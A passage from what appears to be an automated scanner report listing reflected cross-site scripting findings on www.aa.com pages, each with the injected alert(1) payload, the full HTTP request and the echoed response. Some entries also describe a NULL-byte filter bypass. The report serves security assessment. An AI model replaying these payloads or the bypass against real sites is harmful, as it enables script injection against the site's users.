Date: Sun, 13 Nov 2011 13:33:45 GMT
Connection: keep-alive
Vary: Accept-Encoding

No class by name: CancelVPNRAjaxUtilef8da<script>alert(1)</script>4a04c56c4e3

1.22. https://www.aa.com/dwr/interface/CountryLanguageSelectAjaxUtils.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/CountryLanguageSelectAjaxUtils.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f74e4<script>alert(1)</script>c7dba976432 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/CountryLanguageSelectAjaxUtils.jsf74e4<script>alert(1)</script>c7dba976432 HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 90
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:33:45 GMT
Connection: keep-alive
Vary: Accept-Encoding

No class by name: CountryLanguageSelectAjaxUtilsf74e4<script>alert(1)</script>c7dba976432

1.23. https://www.aa.com/dwr/interface/HomePageMyReservationsAjaxAction.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/HomePageMyReservationsAjaxAction.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 47a9b<script>alert(1)</script>b5f7e5bf5d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/HomePageMyReservationsAjaxAction.js47a9b<script>alert(1)</script>b5f7e5bf5d2 HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 92
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:44:27 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0000REhCEOkRsgFrmIsDwsxWe-D:15mbfaj65; Path=/

No class by name: HomePageMyReservationsAjaxAction47a9b<script>alert(1)</script>b5f7e5bf5d2

1.24. https://www.aa.com/dwr/interface/HomePageMyReservationsAjaxAction.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/HomePageMyReservationsAjaxAction.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 71755<script>alert(1)</script>ad50b7b51f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /dwr/interface/HomePageMyReservationsAjaxAction.js71755<script>alert(1)</script>ad50b7b51f2 HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 92
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:33:47 GMT
Connection: keep-alive
Vary: Accept-Encoding

No class by name: HomePageMyReservationsAjaxAction71755<script>alert(1)</script>ad50b7b51f2

1.25. https://www.aa.com/dwr/interface/HomePageUtils.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/HomePageUtils.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a4d6d<script>alert(1)</script>96f9002ee6f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/HomePageUtils.jsa4d6d<script>alert(1)</script>96f9002ee6f HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 73
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:33:45 GMT
Connection: keep-alive
Vary: Accept-Encoding

No class by name: HomePageUtilsa4d6d<script>alert(1)</script>96f9002ee6f

1.26. https://www.aa.com/dwr/interface/SmartSuggestAjaxUtils.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /dwr/interface/SmartSuggestAjaxUtils.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2a89d<script>alert(1)</script>a73c2318f6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dwr/interface/SmartSuggestAjaxUtils.js2a89d<script>alert(1)</script>a73c2318f6a HTTP/1.1
Host: www.aa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: https://www.aa.com/homePage.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=B1E9CE01A4CE9839; JSESSIONID=00007q3GOaaeZtlgcpRSGTwghpE:15mbfaj65; homeAirport=3+ti7J6DTm8=; COUNTRY_CODE=UCKRRdXdz9w=; saleCity=3+ti7J6DTm8=; aawaScreenRes=done; AX42=CT-2; OX_plg=swf,sl,qt,wmp,shk; sessionLocale=en_US

Response

HTTP/1.1 501 Not Implemented
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 81
Server: On-Demand Router/1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:44:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0000PNSl-VygweoWPd52FR0lDXi:15mbfaj65; Path=/

No class by name: SmartSuggestAjaxUtils2a89d<script>alert(1)</script>a73c2318f6a

1.27. https://www.aa.com/homePage.do [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /homePage.do

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad672"><img%20src%3da%20onerror%3dalert(1)>62d6135677e was submitted in the locale parameter. This input was echoed as ad672"><img src=a onerror=alert(1)>62d6135677e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /homePage.do?selectedTab=aa-hp-myAccount&locale=en_USad672"><img%20src%3da%20onerror%3dalert(1)>62d6135677e HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:37:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-USAD672"><IMG SRC=A ONERROR=ALERT(1)>62D6135677E" xml:lang="en-USAD672">
...[SNIP]...

1.28. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/aboutUs/customerCommitment/main.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bab0"><img%20src%3da%20onerror%3dalert(1)>ab7e280b476 was submitted in the anchorEvent parameter. This input was echoed as 8bab0"><img src=a onerror=alert(1)>ab7e280b476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/aboutUs/customerCommitment/main.jsp?anchorEvent=false8bab0"><img%20src%3da%20onerror%3dalert(1)>ab7e280b476&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100055


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false8bab0"><img src=a onerror=alert(1)>ab7e280b476" />
...[SNIP]...

1.29. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/aboutUs/customerCommitment/main.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccd3"><img%20src%3da%20onerror%3dalert(1)>4addc91e2ca was submitted in the from parameter. This input was echoed as 5ccd3"><img src=a onerror=alert(1)>4addc91e2ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/aboutUs/customerCommitment/main.jsp?anchorEvent=false&from=Nav5ccd3"><img%20src%3da%20onerror%3dalert(1)>4addc91e2ca HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100058


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav5ccd3"><img src=a onerror=alert(1)>4addc91e2ca" />
...[SNIP]...

1.30. https://www.aa.com/i18n/aboutUs/customerCommitment/main.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/aboutUs/customerCommitment/main.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c3a"><img%20src%3da%20onerror%3dalert(1)>936d577a2b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18c3a"><img src=a onerror=alert(1)>936d577a2b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/aboutUs/customerCommitment/main.jsp?18c3a"><img%20src%3da%20onerror%3dalert(1)>936d577a2b8=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:40:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 99995


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="18c3a"><img src=a onerror=alert(1)>936d577a2b8" value="1" />
...[SNIP]...

1.31. https://www.aa.com/i18n/amrcorp/newsroom/main.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.aa.com
Path:   /i18n/amrcorp/newsroom/main.jsp

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00a3d55<a>0b9c80dc06c was submitted in the REST URL parameter 1. This input was echoed as a3d55<a>0b9c80dc06c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%00a3d55<a>0b9c80dc06c/amrcorp/newsroom/main.jsp HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Server: On-Demand Router/1.0
X-Cnection: Close
Date: Sun, 13 Nov 2011 13:42:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40578


<HTML>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<!-- Meta Tags -->
<meta http-equiv="Expires" content="0"/>
<meta http-equiv="Pragma" content="n
...[SNIP]...
</B>/.a3d55<a>0b9c80dc06c/amrcorp/newsroom/main.jsp<BR>
...[SNIP]...

1.32. https://www.aa.com/i18n/productsGifts/giftCard.jsp [anchorEvent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/productsGifts/giftCard.jsp

Issue detail

The value of the anchorEvent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c6ad"><img%20src%3da%20onerror%3dalert(1)>3a2ba7b173 was submitted in the anchorEvent parameter. This input was echoed as 4c6ad"><img src=a onerror=alert(1)>3a2ba7b173 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/productsGifts/giftCard.jsp?anchorEvent=false4c6ad"><img%20src%3da%20onerror%3dalert(1)>3a2ba7b173&from=Nav HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113351


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="anchorEvent" value="false4c6ad"><img src=a onerror=alert(1)>3a2ba7b173" />
...[SNIP]...

1.33. https://www.aa.com/i18n/productsGifts/giftCard.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/productsGifts/giftCard.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bb09"><img%20src%3da%20onerror%3dalert(1)>ad272008981 was submitted in the from parameter. This input was echoed as 5bb09"><img src=a onerror=alert(1)>ad272008981 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/productsGifts/giftCard.jsp?from=Nav5bb09"><img%20src%3da%20onerror%3dalert(1)>ad272008981 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113274


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav5bb09"><img src=a onerror=alert(1)>ad272008981" />
...[SNIP]...

1.34. https://www.aa.com/i18n/productsGifts/giftCard.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/productsGifts/giftCard.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c88"><img%20src%3da%20onerror%3dalert(1)>091eb12a06a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5c88"><img src=a onerror=alert(1)>091eb12a06a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/productsGifts/giftCard.jsp?f5c88"><img%20src%3da%20onerror%3dalert(1)>091eb12a06a=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113262


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="f5c88"><img src=a onerror=alert(1)>091eb12a06a" value="1" />
...[SNIP]...

1.35. https://www.aa.com/i18n/reservations/paymentOptions/cashPayments.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/cashPayments.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34945"><img%20src%3da%20onerror%3dalert(1)>f6d3077519a was submitted in the from parameter. This input was echoed as 34945"><img src=a onerror=alert(1)>f6d3077519a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/cashPayments.jsp?from=Nav34945"><img%20src%3da%20onerror%3dalert(1)>f6d3077519a HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108450


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav34945"><img src=a onerror=alert(1)>f6d3077519a" />
...[SNIP]...

1.36. https://www.aa.com/i18n/reservations/paymentOptions/cashPayments.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/cashPayments.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba81"><img%20src%3da%20onerror%3dalert(1)>8abe4a6248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1ba81"><img src=a onerror=alert(1)>8abe4a6248 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/cashPayments.jsp?1ba81"><img%20src%3da%20onerror%3dalert(1)>8abe4a6248=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108436


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="1ba81"><img src=a onerror=alert(1)>8abe4a6248" value="1" />
...[SNIP]...

1.37. https://www.aa.com/i18n/reservations/paymentOptions/creditDebitCards.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/creditDebitCards.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 339a6"><img%20src%3da%20onerror%3dalert(1)>e90081f9fe0 was submitted in the from parameter. This input was echoed as 339a6"><img src=a onerror=alert(1)>e90081f9fe0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/creditDebitCards.jsp?from=Nav339a6"><img%20src%3da%20onerror%3dalert(1)>e90081f9fe0 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108750


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav339a6"><img src=a onerror=alert(1)>e90081f9fe0" />
...[SNIP]...

1.38. https://www.aa.com/i18n/reservations/paymentOptions/creditDebitCards.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/creditDebitCards.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3298d"><img%20src%3da%20onerror%3dalert(1)>e6f307b5db5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3298d"><img src=a onerror=alert(1)>e6f307b5db5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/creditDebitCards.jsp?3298d"><img%20src%3da%20onerror%3dalert(1)>e6f307b5db5=1 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108738


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="3298d"><img src=a onerror=alert(1)>e6f307b5db5" value="1" />
...[SNIP]...

1.39. https://www.aa.com/i18n/reservations/paymentOptions/electronicChecks.jsp [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/electronicChecks.jsp

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eba1"><img%20src%3da%20onerror%3dalert(1)>eb546ab6c04 was submitted in the from parameter. This input was echoed as 8eba1"><img src=a onerror=alert(1)>eb546ab6c04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /i18n/reservations/paymentOptions/electronicChecks.jsp?from=Nav8eba1"><img%20src%3da%20onerror%3dalert(1)>eb546ab6c04 HTTP/1.1
Host: www.aa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,max-age=0
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: On-Demand Router/1.0
Date: Sun, 13 Nov 2011 13:39:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109738


                       <!-- Inserting TagLib here -->


<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />



...[SNIP]...
<input type="hidden" name="from" value="Nav8eba1"><img src=a onerror=alert(1)>eb546ab6c04" />
...[SNIP]...

1.40. https://www.aa.com/i18n/reservations/paymentOptions/electronicChecks.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aa.com
Path:   /i18n/reservations/paymentOptions/electronicChecks.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cee2e"><img%20src%3da%20onerror%3dalert(1)>a952f7fc535 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cee2e"><img src=a onerror=alert(1)>a952f7fc535 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

